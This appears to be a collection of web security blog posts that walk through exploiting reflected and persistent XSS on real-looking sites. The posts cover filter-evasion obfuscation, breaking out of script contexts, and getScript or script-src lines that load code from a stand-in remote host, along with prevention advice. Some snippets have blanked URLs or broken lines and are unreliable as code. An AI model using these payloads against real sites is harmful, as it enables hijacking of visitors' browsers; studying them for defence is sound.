The Resurrected Skull

It’s been seven hours and fifteen days.

No. Wait. It’s been seven years and much more than fifteen days.

But nothing compares to the relief of finishing the 4th edition of The Anti-Hacker Toolkit. The book with the skull on its cover. A few final edits need to be wrangled, but they’re minor compared to the major rewrite this project entailed.

AHT 1st Edition

The final word count comes in around 200,000. That’s slightly over twice the length of Hacking Web Apps. (Or roughly 13,000 Tweets or 200 blog posts.) Those numbers are just trivia associated with the mechanics of writing. The reward of writing is the creative process and the (eventual…) final product.

In retrospect (and through the magnifying lens of self-criticism), some of the writing in the previous edition was awful. Some of it was just inconsistent with terminology and notation. Some of it was unduly sprinkled with empty phrases or sentences that should have been more concise. Fortunately, it apparently avoided terrible cliches (all cliches are terrible, I just wanted to emphasize my distaste for them).

Many tools have been excised; others have been added. A few pleaded to remain despite their questionable relevance (I’m looking at you, wardialers). But such content was trimmed to make way for the modern era of computers without modems or floppy drives.

The previous edition had a few quaint remarks, such as a reminder to save files to a floppy disk, references to COM ports, and astonishment at file sizes that weighed in at a few dozen megabytes. The word zombie appeared three times, although none of the instances were as threatening as the one that appeared in my last book.

Over the next few weeks I’ll post more about this new edition and introduce you to its supporting web site. That will give you a better flavor of what the book contains than any book-jacket marketing dazzle.

In spite of the time dedicated to the book, I’ve added 17 new posts this year. Five of them have broken into the most-read posts since January. So, while I take some down time from writing, check out the archives for items you may have missed.

And if you enjoy reading content here, please share it! Twitter has proven to be the best mechanism for gathering eyeballs. Also, consider pre-ordering the new 4th edition or checking out my current book on web security. In any case, thanks for stopping by.

Meanwhile, I’ll be relaxing to music. I’ve put Sinéad O’Connor in the queue; it’s a beautiful piece. (And a cover of a Prince song, which reminds me to put some Purple Rain in the queue, too). Then it’s on to a long set of Sisters of Mercy, Wumpscut, Skinny Puppy, and anything else that makes it feel like every day is Halloween.

Two Hearts That Beat As One

A common theme among injection attacks that manifest within a JavaScript context (e.g. <script> tags) is that proper payloads preserve proper syntax. We’ve belabored the point of this dark art with such dolorous repetition that even Professor Umbridge might approve.

We’ve covered the most basic of HTML injection exploits, exploits that need some tweaking to bypass weak filters, and different ways of constructing payloads to preserve their surrounding syntax. The typical process is to choose a parameter (or a cookie!), find if and where its value shows up in a page, then hack the page. It’s a single-minded purpose against a single injection vector.

Until now.

It’s possible to maintain this single-minded purpose, but to do so while focusing on two variables. This is an elusive beast of HTML injection in which an app reflects more than one parameter within the same page. It gives us more flexibility in the payloads, which sometimes helps evade certain kinds of patterns used in input filters or web app firewall rules.

This example targets two URL parameters used as arguments to a function that expects the start and end of a time period. Forget time, we’d like to start an attack and end with its success.

Here’s a version of the link with numeric arguments:

start=1&end=2

The app uses these values inside a <script> block, as follows:

var start = 1,
    end = 2;

$(JM.Scheduler.TimeZone.init(start, end));

The “normal” attack is simple:

start=alert(9);//&end=2

This results in a successful alert(), but the app has some sort of silly check that strips the end value if it’s not greater than the start. Thus, you can’t have start=2&end=1. And the comparison always fails if you use a string for start, because end will never be greater than whatever the string is cast to (likely zero). At least the devs remembered to enforce numeric consistency in spite of the security deficiency.

var start = alert(9);//,
    end = ;

$(JM.Scheduler.TimeZone.init(start, end));

But that’s inelegant compared with the attention to detail we’ve been advocating for exploit creation. The app won’t assign a value to end, thereby leaving us with a syntax error. To compound the issue, the developers have messed up their own code, leaving the browser to complain:

ReferenceError: Can’t find variable: $

Let’s see what we can do to help. For starters, we’ll just assign start to end (internally, the app has likely compared a string-cast-to-number with another string-cast-to-number, both of which fail identically, which lets the payload through). Then, we’ll resolve the undefined variable for them — but only because we want a clean error console upon delivering the attack.

start=alert(9);//&end=start;$=null

var start = alert(9);//,
    end = start;$=null;

$(JM.Scheduler.TimeZone.init(start, end));
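Why did end=start sneak past the greater-than check? Here is a minimal sketch of the likely server-side logic; the function name and the use of parseFloat are assumptions, not the site’s actual code:

```javascript
// Hypothetical reconstruction of the app's range check.
function sanitizeRange(start, end) {
  // Strip end when it isn't greater than start. With non-numeric strings,
  // parseFloat yields NaN, every comparison involving NaN is false, and
  // the strip never fires -- so string payloads survive intact.
  if (parseFloat(end) <= parseFloat(start)) {
    end = "";
  }
  return { start: start, end: end };
}

const numeric = sanitizeRange("2", "1");                      // end stripped: 1 <= 2
const attack = sanitizeRange("alert(9);//", "start;$=null");  // both NaN: end kept
```

Both casts “fail identically” to NaN, which is exactly the behavior the end=start payload relies on.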

What’s interesting about “two factor” vulns like this is the potential for using them to bypass validation filters.

start=window["ale"/*&end=*/%2b"rt"](9)

var start = window["ale"/*
    end = */+"rt"](9);

$(JM.Scheduler.TimeZone.init(start, end));

Rather than think about different ways to pop an alert() in someone’s browser, think about what could be possible if jQuery was already loaded in the page. Thanks to JavaScript’s design, it doesn’t even hurt to pass extra arguments to a function:

start=$["getSc"%2b"ript"](""&end=undefined)

var start = $["getSc"+"ript"]("",
    end = undefined);

$(JM.Scheduler.TimeZone.init(start, end));
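The bracket-notation trick works because concatenated strings resolve to an ordinary property name. A stand-in object (not jQuery itself; the method body is illustrative) shows the equivalence:

```javascript
// Stand-in for the $ object; the real attack indexes into jQuery.
const lib = {
  getScript: function (url) { return "loading " + url; }
};

// "getSc" + "ript" resolves to the same property as the literal name,
// which is why a filter looking for "getScript" never sees it.
const obfuscated = lib["getSc" + "ript"]("//evil.example/x.js");
const direct = lib.getScript("//evil.example/x.js");
```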

And if it’s necessary to further obfuscate the payload we might try this:

start="getSc"%2b"ript"&end=$[start]%28%22//

var start = "getSc"+"ript",
    end = $[start]("//");

$(JM.Scheduler.TimeZone.init(start, end));

Maybe combining two parameters into one attack reminds you of the theme of two hearts from 80s music. Possibly U2’s War from 1983. I never said I wasn’t gonna tell nobody about a hack like this, just like that Stacey Q song a few years later — two of hearts, two hearts that beat as one. Or Phil Collins’ Two Hearts three years after that.

Although, if you forced me to choose between two hearts that beat as one, I’d choose a Time Lord, of course. In particular, someone who preceded all that music: Tom Baker. Jelly Baby, anyone?
Tom Baker

A True XSS That Needs To Be False

It is occasionally necessary to persuade a developer that an HTML injection vuln still capitulates to exploitation even when a redirect conducts the browser away from the exploit’s embodied alert(). Sometimes, parsing an expression takes more effort than breaking it.

So, redirect your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:

id="onmouseover=alert(9);a="

The page reflects the value of this id parameter within an href attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:

<a href=" reference: "onmouseover=alert(9);a=""></a>

Yet the browser goes into an infinite redirect loop without ever launching the alert. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the <body> element — well after several other JavaScript functions and page content. It should have been present in the <head>. It’s like the developers knew they should do something about clickjacking, heard about a top.location trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)

<script type="text/javascript">
if (location.href != '"onmouseover=alert(9);a="') { location.href = '"onmouseover=alert(9);a="';

The URL in your browser bar may look exactly like the URL in the inequality test. However, the location.href property contains the URL-encoded (a.k.a. percent-encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new location.href. As such, the following two strings are not identical:

%22onmouseover=alert(9);a=%22
"onmouseover=alert(9);a="
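A quick way to see the mismatch, using encodeURI as a stand-in for the browser’s normalization of location.href (the exact character set a browser encodes is an assumption here):

```javascript
// The raw string as the developer wrote it into the inline script.
const rawInPage = '"onmouseover=alert(9);a="';

// What location.href would report back: quotation marks become %22.
const fromLocationHref = encodeURI(rawInPage);

// The inequality always holds, so the "anti-framing" check redirects forever.
const willRedirect = fromLocationHref !== rawInPage;
```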

Since the anti-framing triggers before the browser encounters the affected href, the onmouseover payload (or any other payload inserted in the tag) won’t trigger.

This isn’t a problem. Just redirect your onhack event from the href to the if statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected; otherwise, the redirect makes the exploit more obvious.

JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the alert() and a Boolean operator to force a false outcome.
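The combination is easy to check in isolation; here fake stands in for alert(), which isn’t available outside a browser:

```javascript
let fired = false;
const fake = function () { fired = true; };  // stand-in for alert()

// '' + fake() invokes the function and concatenates its undefined return
// value into the string "undefined" (truthy), so evaluation continues to
// null == '', which is false -- forcing the whole condition false.
const outcome = ('' + fake()) && (null == '');
```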

The new payload is:

'%2balert(9)%26%26null%3d%3d'

Which results in this:

<script type="text/javascript">
if (location.href != ''+alert(9)&&null=='') { location.href = ''+alert(9)&&null=='';

Note that we could have used other operators to glue the alert() to its preceding string. Any arithmetic operator would have worked.

We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:
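The original list didn’t survive formatting here, but any innocuous comparison that evaluates to false fits the pattern; a few hedged stand-ins:

```javascript
// Each expression is false without ever mentioning "null".
const alternates = [
  1 > 2,
  '' === '9',
  'a' === 'b',
  0 === 1
];
const allFalse = alternates.every(function (x) { return x === false; });
```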


This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with different execution contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g. <script>) after the href, but the if statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page — URL encoding would have been a logical step.

A Hidden Benefit of HTML5

Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this task, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that works around validation filters and avoids being defeated by output encoding schemes. Sometimes it’s necessary to wander the dusty passages of parsing rules in search of a hidden door that opens an element to being exploited.


HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

And every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of a hidden input field. In the following example, note that the quotation mark has not been filtered or encoded:

x"

<input type="hidden" name="sortOn" value="x"">

If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a <z" sequence to consume it. A <z> tag with an empty attribute is harmless.

x"><script>alert(9)</script><z"

<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">

Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">

Or, taking advantage of new HTML5 events, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">

The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">

But modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, Attributes:

“There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.”

Okay, we have a constraint, but no instructions yet on how to handle this error condition. Without them, it’s not clear how a browser should handle multiple attributes with the same name. Ambiguity leads to security problems; it’s to be avoided at all costs.

From the spec, Attribute name state:

“When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”

So, we’ll never be able to fool a browser by “casting” the input field to a different type by a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.
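A toy attribute collector illustrates the rule; this sketches the spec’s behavior, not any browser’s actual tokenizer:

```javascript
// Keep the first occurrence of each attribute name and drop later
// duplicates, per the HTML5 "attribute name state" rule.
function collectAttrs(pairs) {
  const attrs = {};
  for (const pair of pairs) {
    const name = pair[0].toLowerCase();
    if (!(name in attrs)) {
      attrs[name] = pair[1];  // duplicate names are parse errors; dropped
    }
  }
  return attrs;
}

// An injected type="text" after the legitimate type="hidden" is dropped...
const safe = collectAttrs([["type", "hidden"], ["type", "text"]]);
// ...but wins when the injection point precedes the legitimate attribute.
const unsafe = collectAttrs([["type", "text"], ["type", "hidden"]]);
```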

(The messy history of HTML continues unabated by the optimism of a version number. The WHATWG HTML Living Standard defines its parsing rules in section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >

HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection, but the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as “the absence of unmitigatable surprise”. Look for flaws in modern browsers where this trick works (e.g. maybe a compatibility mode or the lack of an explicit <!doctype html> weakens the browser’s parsing algorithm). With luck, most of the problems you discover will be implementation errors to be fixed in a particular browser rather than a design change required of the spec.

HTML5 gives us a better design to help minimize parsing-based security problems. It’s up to web developers to design better sites to help maximize the security of our data.

JavaScript: A Syntax Oddity

Should you find yourself sitting in a tin can, far above the world, it’s reasonable to feel like there’s nothing you can do. Just stare out the window and remark that planet earth is blue.
Bowie Is Ticket
Should you find yourself writing a web app, with security out of this world, then it’s reasonable to feel like there’s something you forgot to do.

Here’s a web app that, at first glance, seems secure against HTML injection. However, all you have to do is tell the browser what it wants to know. Kind of like our floating Major Tom — the papers want to know whose shirts you wear.

Every countdown to an HTML injection exploit begins with a probe. Here’s a simple one:

"autofocus/onfocus=alert(9);//&search-alias=something

The site responds with a classic reflection inside an <input> field. However, it foils the attack by HTML encoding the quotation mark. After several attempts, we have to admit there’s no way to escape the quoted string:

<input type="hidden" name="url"

Time to move on. But we’re only moving on from that particular payload. A diligent hacker pays attention to detail because, sometimes, that persistence pays off. (Regular readers might find this situation strangely familiar…)

Before we started mutating URL parameters, the link looked more like this:

One behavior that stood out for this page was the reflection of several URL parameters within a JavaScript block. In the original page, the JavaScript was minified and condensed to a single line. We’ll introduce the script block in a more readable composition that includes some indentation and line feeds in order to more clearly convey its semantics. The following script shows up further down the page; the key point to notice is the appearance of the number 412603031 from the node parameter:

  var i='DAaba0';

Essentially, it’s an anonymous function that takes four parameters, two of which are evidently the window and document objects since those show up in the calling arguments. If you’re having trouble conceptualizing the previous JavaScript, consider this reduced version:

  var i='DAaba0';

So, our goal must be to refine what gets delivered in place of the XSS characters in order to successfully execute arbitrary JavaScript.

The first step is to insert sufficient syntax to terminate the preceding tokens (e.g. function declaration, methods). This is as straightforward as counting parentheses and such. For example, the following gets us to a point where the JavaScript engine parses correctly up to the XSS.

  var i='DAaba0';

Notice in the previous example that we’ve closed the anonymous function, but there’s no need to execute it. This is the difference between (function(){})() and (function(){}) — we omitted the final () since we’re trying to avoid introducing parsing or execution errors preceding our payload.
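The distinction is easy to demonstrate:

```javascript
let ran = false;

// A parenthesized function expression evaluates to a function object;
// nothing executes yet.
const expr = (function () { ran = true; });
const beforeCall = ran;  // still false

// Appending () invokes it.
expr();
const afterCall = ran;   // now true
```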

Next, we find a payload that’s appropriate for the injection context. The reflection point is already within a JavaScript execution block. Hence, there’s no need to use a payload with <script> tags or other elements, nor do we need to rely on an intrinsic event like onfocus().

The simplest payload in this case would be alert(9). However, it appears the site might be rejecting any payload with the word “alert” in it. No problem, we’ll turn to a trivial obfuscation method:

window['a'%2b'lert'](9)

Since we’re trying to cram several concepts into this tutorial, we’ll wrap the payload inside its own anonymous function. Incidentally, this kind of syntax has the potential to horribly confuse regular expressions with which a developer intended to match balanced parentheses.

(function(){window['a'%2b'lert'](9)})()

Recall that in the original site all of the JavaScript was condensed to a single line. This makes it easy for us to clean up the remaining tokens to ensure the browser doesn’t complain about any subsequent parsing errors. Otherwise, the contents of the JavaScript block may not be executed. Therefore, we’ll try throwing in an opening comment delimiter, like this:

'})});(function(){window['a'%2b'lert'](9)})()/*

Oops. The payload fails. In fact, this was where one review of the vuln stopped. The payload never got so complicated as using the obfuscated alert, but it did include the trailing comment delimiter. Since the browser never executed any pop-ups, everyone gave up and called this a false positive.

Oh dear, it seems hackers can be as fallible as the developers that give us these nice vulns to chew on.

Take a look at the browser’s ever-informative error console. It tells us exactly what went wrong:

SyntaxError: Multiline comment was not closed properly

Everything following the payload falls on a single line. So, we really should have just used the single-line comment delimiter:

'})});(function(){window['a'%2b'lert'](9)})()//

And we’re done! (For extra points, try figuring out what the syntax might need to be if the JavaScript spanned multiple lines. Hint: This all started with an anonymous function.)

Here’s the whole payload inside the URL. Make sure to encode the plus operator as %2b — otherwise it’ll be misinterpreted as a space.

'})});(function(){window['a'%2b'lert'](9)})()//&search-alias=something

And here’s the result within the script block. (WordPress’ syntax highlighting displays it accurately, which is another hint that we’ve modified the JavaScript context correctly.)


There are a few points to review in this example. Here are a few hints for discovering and exploiting HTML injection:

  • Inspect the entire page for areas where a URL parameter name or value is reflected. Don’t stop at the first instance.
  • Use a payload appropriate for the reflection context. In this case, we could use raw JavaScript because the reflection appeared within a <script> element.
  • Write clean payloads. Terminate preceding tokens, comment out (or correctly open) following tokens. Pay attention to messages reported in the browser’s error console.
  • Don’t be foiled by sites that blacklist “alert”. Effective attacks don’t even need to use an alert() function. Know simple obfuscation techniques to bypass blacklists. (Obfuscation really just means an awareness of JavaScript’s objects, methods, semantics, and creativity.)
  • Use the JavaScript that’s already present. Most sites already have a library like jQuery loaded. Take advantage of $() to create new and exciting elements within the page.

And here are a few hints for preventing it:

  • Use an encoding mechanism appropriate to the context where data from the client will be displayed. The site correctly used HTML encoding for " characters within the value attribute of an <input> tag, but forgot about dealing with the same value when it was inserted into a JavaScript context.
  • Use string concatenation at your peril. Create helper functions that are harder to misuse.
  • When you find one instance of a programming mistake or a bad programming pattern, search the entire code base for other instances — it’s quicker than waiting for another exploit to appear.
  • Realize that blacklisting “alert” won’t get you anywhere. Have an idea of how diverse HTML injection payloads can be.
  • Read a web site, read a book.

There’s nothing really odd about JavaScript syntax. It’s a flexible language with several ways of concatenating strings, casting types, and executing methods. We know developers can build sophisticated libraries with JavaScript. We know hackers can build sophisticated exploits with it.
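A few of the equivalent ways JavaScript can assemble the same string, which is exactly why blacklisting a word like “alert” is futile (the target word here is arbitrary):

```javascript
const a = 'ale' + 'rt';                                  // concatenation
const b = ['ale', 'rt'].join('');                        // Array.prototype.join
const c = String.fromCharCode(97, 108, 101, 114, 116);   // character codes
```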

We know Major Tom’s a junkie, strung out in Heaven’s high, hitting an all-time low. I have my own addiction, but the little green wheels following me are just so many HTML injection vulns, waiting to be discovered.

RVAsec 2013: JavaScript Security & HTML5

Here are the slides for my presentation at this year’s RVAsec, JavaScript Security & HTML5. Thanks to all who attended!

RVAsec, held in Richmond, VA, is a relatively new conference. But one complete with hardware badges, capture the flag, and pizza and donuts for breakfast. So, yeah, mark your calendar for next year; it’s a worthwhile trip.

This was an iteration on the web security topics I’ve been focused on for the last several months, so you’ll notice many familiar concepts from previous presentations. (And some more emphasis on privacy, which shouldn’t be forgotten on the modern web.) A great thing about being able to talk on these subjects is that it gives me a chance to improve the content based on feedback and questions, and adjust the flow to keep it engaging. Now I’m at the point where I have enough material to take off on new tangents and build new content — it’ll be a busy summer.

The Wrong Location for a Locale

Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encodings like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support Parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)

Namárië

A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous posts have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment — which doesn’t make a round trip to the web site — isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

The catch is that some key characters in the hack have been rendered into an HTML-encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute of the <body> tag:

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&#034;&gt;



And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&#034;&gt;



And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;


" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example: we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">
<html xmlns="" lang="en-US">


" xml:lang="en-US">



And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!--  Include the Reference Page Tag script -->
<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US"&gt;



Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

">%0A%0D';alert(9)//

Too bad the apostrophe character (‘) remains encoded:

<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US&#034;&gt;

&#039;;alert(9)//';

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

As expected, the response contains the HTML-encoded version of the payload. We lose the quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&#034;&gt;

&lt;script src=&#034;&#034;&gt;&lt;/script&gt;


But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by the remote host:

<html xmlns="" lang="en-US">

<script src=""></script>

" xml:lang="en-US">

<script src=""></script>


Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload — it’s just a plain link to the page.

So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A;
        sessionLocale="en_US\">  <script src=\"\"></script>  ";

Sometime between the request to the locale page and the request to the contact page, the site decided to take the locale parameter and place it in a cookie. Then, the site took the cookie presented in the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and thereby let the user specify a custom locale. The locale isn’t as picturesque as Hogwarts, nor as destitute as District 12, but Hermione and Katniss would rip apart a vuln like this.

Hermione's Exam Schedule
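Reduced to its essentials, the server-side flow probably resembled the following sketch; the function names, the cookie object, and the markup fragment are assumptions for illustration:

```javascript
// Step 1: the locale request copies the parameter into a cookie, unvalidated.
function handleLocaleRequest(cookies, localeParam) {
  cookies.sessionLocale = localeParam;
}

// Step 2: a later page concatenates the cookie into markup with no encoding.
function renderContactPage(cookies) {
  return '<html lang="' + cookies.sessionLocale + '">';
}

const cookies = {};
handleLocaleRequest(cookies, 'en_US"><script src="//evil.example/x.js"><\/script><"');
const page = renderContactPage(cookies);
// page now carries a live script element into every later visit
```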

Insistently Marketing Persistent XSS

Want to make your site secure? Write secure code. Want to make it less secure? Add someone else’s code to it. Even better, do it in the “cloud.”

The last few HTML injection articles here demonstrated the reflected variant of the attack. The exploit appears within the immediate response to the request that contains the XSS payload. These kinds of attacks are also ephemeral because the exploit disappears once the victim browses away from the infected page. The attack must be re-delivered for every visit to the vulnerable page.

A persistent HTML injection is more insidious. The web site still reflects the payload into a page, but not necessarily in the immediate response to the request that delivered the payload. You have to find the payload, e.g. the friendly alert(), in some other area of the app. In many cases the payload only needs to be delivered once. Any subsequent visit to the page where it’s reflected exposes the visitor to the exploit. This is very dangerous when the page has a one-to-many relationship where one attacker infects the page and many users visit the page via normal “safe” links that don’t have an XSS payload.

Persistence comes in many guises and durations. Here’s one that associates the persistence with a cookie.

Our example of the day decided to track users for marketing and advertising purposes. There’s little reason to love user tracking (unless 95% of your revenue comes from it), but you might like it a little more if you could use it for HTML injection.

The hack starts off like any other reflected XSS test. Another day, another alert:

But the response contains nothing interesting. It didn’t reflect any piece of the payload, not even in an HTML encoded or stripped version. And — spoiler alert — not in the following script block:

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
if(s.products) s.products = s.products.replace(/,$/,'');
if( =^,/,'');
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

But we’re not at the point of nothing ventured, nothing gained. We’re just at the point of nothing reflected, something might still be wrong.

So we poke around at some more links on the site, just visiting them as any user might, without injecting any new payloads, working under the assumption that the payload could have found a persistent lair to curl up in and wait for an unsuspecting victim.

Sure enough, we find a reflection in an (apparently) unrelated link. Note that the payload has already been delivered. This request has no indicators of XSS:

We find the alert() nested inside a JavaScript variable where, sadly, it remains innocuous and unexploited. For reasons we don’t care about, a comment warns us not to ALTER ANYTHING BELOW THIS LINE!

You don’t have to shout. We’ll just alter things above the line.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17="alert(9)";
if(s.products) s.products = s.products.replace(/,$/,'');
if( =^,/,'');
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

There are plenty of fun ways to inject into JavaScript string concatenation. We’ll stick with the most obvious one: the plus (+) operator. To do this we need to return to the original injection point and alter the payload (just don’t touch ANYTHING BELOW THIS LINE!):

"%2balert(9)%2b"
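To see why that payload works, here’s a standalone sketch in plain JavaScript (with a stubbed alert, since there’s no browser involved). Once the decoded value sits between the quotes of the assignment, the “string assignment” is really concatenation around a function call:

```javascript
// A stub stands in for the browser's alert(); it records that it fired.
let fired = null;
const alert = (n) => { fired = n; };

// What the server emits after splicing the decoded payload between quotes:
const emitted = 's.prop17=""+alert(9)+"";';
const s = {};
eval(emitted);         // the "string assignment" now calls alert(9)
console.log(fired);    // 9
console.log(s.prop17); // "undefined" (concatenation of "" + undefined + "")
```

The assignment still succeeds, so nothing looks broken to the site; the function call just rides along inside the expression.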

We head back to the cute_animal.aspx page to see how the payload fared. Before we can click Show Page Source, we’re greeted with that happy hacker greeting: the friendly alert() window.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17=""+alert(9)+"";
if(s.products) s.products = s.products.replace(/,$/,'');
if( =^,/,'');
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

After experimenting with a few variations on the request to the reflection point (the cute_animal.aspx page), we narrow the persistent carrier down to a cookie value. The cookie is a long string of hexadecimal digits whose length and content do not change between requests. This is a good hint that it’s some sort of UUID pointing to a record in a data store that contains the XSS payload from the om variable. (The cookie’s unchanging nature implies that the payload is not inserted into the cookie, encrypted or otherwise.) Get rid of the cookie and the alert no longer appears.
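That suspected flow can be sketched in a few lines. Everything here is hypothetical (the function names and the Map standing in for the site’s data store are mine), but it captures the one-request-stores, another-request-reflects pattern:

```javascript
// Hypothetical sketch: one request stores the attacker-controlled om value
// under a tracking-cookie ID; a later, payload-free request writes it into
// the script block verbatim.
const store = new Map(); // stands in for the site's tracking data store

function recordVisit(cookieId, omParam) {
  store.set(cookieId, omParam); // the payload persists server-side
}

function renderTrackingScript(cookieId) {
  const tracked = store.get(cookieId) || '';
  // Insecure: raw concatenation of client-derived data into JavaScript
  return 's.prop17="' + tracked + '";';
}

recordVisit('a1b2c3', '"+alert(9)+"');       // the one-time delivery request
console.log(renderTrackingScript('a1b2c3')); // any later "safe" request
// s.prop17=""+alert(9)+"";
```

Note that the second request carries no payload at all; the cookie ID alone is enough to pull the exploit back out of storage.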

The cause appears to be string concatenation where the s.prop17 variable is assigned a value associated with the cookie. It’s a common, basic, insecure design pattern.
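The fix belongs at that concatenation point. Here’s one hedged sketch (the helper name is mine; frameworks and template engines offer their own encoders): serialize the value so quotes, backslashes, and a stray </script> can’t escape the string literal.

```javascript
// Defensive sketch: serialize client-derived data before it becomes
// JavaScript source. JSON.stringify escapes quotes and backslashes; the
// extra replace keeps "</script>" from terminating the script block.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, '\\u003c');
}

const tracked = '"+alert(9)+"';
console.log('s.prop17=' + toJsStringLiteral(tracked) + ';');
// prints: s.prop17="\"+alert(9)+\""; (the payload stays an inert string)
```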

